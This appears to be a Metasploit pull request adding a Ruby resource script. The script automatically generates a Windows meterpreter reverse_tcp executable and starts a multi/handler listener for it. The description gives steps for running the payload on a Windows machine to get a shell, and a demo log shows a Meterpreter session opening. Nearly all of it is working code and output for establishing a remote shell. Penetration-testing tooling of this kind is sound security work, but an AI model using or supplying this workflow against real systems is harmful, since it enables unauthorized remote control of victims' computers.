### PR TITLE
Add RC script for auto payload generation to starting a handler

### DIFF
--- a/scripts/resource/auto_win32_multihandler.rc
+++ b/scripts/resource/auto_win32_multihandler.rc
@@ -1,0 +1,28 @@
+<ruby>
+PAYLOAD = 'windows/meterpreter/reverse_tcp'
+
+def payload_lhost
+  framework.datastore['LHOST'] || Rex::Socket.source_address
+end
+
+def payload_lport
+  framework.datastore['LPORT'] || 4444
+end
+
+def out_path
+  "#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
+end
+
+run_single("use payload/#{PAYLOAD}")
+run_single("set lhost #{payload_lhost}")
+run_single("set lport #{payload_lport}")
+run_single("generate -t exe -f #{out_path}")
+print_status("#{PAYLOAD}'s LHOST=#{payload_lhost}, LPORT=#{payload_lport}")
+print_status("#{PAYLOAD} is at #{out_path}")
+run_single('use exploit/multi/handler')
+run_single("set payload #{PAYLOAD}")
+run_single("set lhost #{payload_lhost}")
+run_single("set lport #{payload_lport}")
+run_single('set exitonsession false')
+run_single('run -j')
+</ruby>


### PR DESCRIPTION
Resolve #4740

Normally we type a bunch of msfvenom/msfconsole commands to generate a payload to setting up a handler, sometimes we're really lazy to type a bunch of commands so this should make things a little bit easier.
## Testing
- [x] Do: ./msfconsole -q -r [path to auto_win32_multihandler.rc]
- [x] It should generate a windows/meterpreter/reverse_tcp in /Users/wchen/.msf4/local/
- [x] It should start a handler
- [x] Copy and paste the payload in /Users/wchen/.msf4/local/ to a Windows system
- [x] Double click on the executable, you should get a shell
## Demo

```
$ ./msfconsole -q -r /Users/sinn3r/rapid7/msf/scripts/resource/auto_win32_multihandler.rc 
[*] Processing /Users/sinn3r/rapid7/msf/scripts/resource/auto_win32_multihandler.rc for ERB directives.
[*] resource (/Users/sinn3r/rapid7/msf/scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes)
lhost => 192.168.1.64
lport => 4444
[*] Writing 73802 bytes to /Users/sinn3r/.msf4/local/meterpreter_reverse_tcp.exe...
[*] windows/meterpreter/reverse_tcp's LHOST=192.168.1.64, LPORT=4444
[*] windows/meterpreter/reverse_tcp is at /Users/sinn3r/.msf4/local/meterpreter_reverse_tcp.exe
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.1.64
lport => 4444
exitonsession => false
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:2242) at 2015-02-12 12:29:53 -0600
```
